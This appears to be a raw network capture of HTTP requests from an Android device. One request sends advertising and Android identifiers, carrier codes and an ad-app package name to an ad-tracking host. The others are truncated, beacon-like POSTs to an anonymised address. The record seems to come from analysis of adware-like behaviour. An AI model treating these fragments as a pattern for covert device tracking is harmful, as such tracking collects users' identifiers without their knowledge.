POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded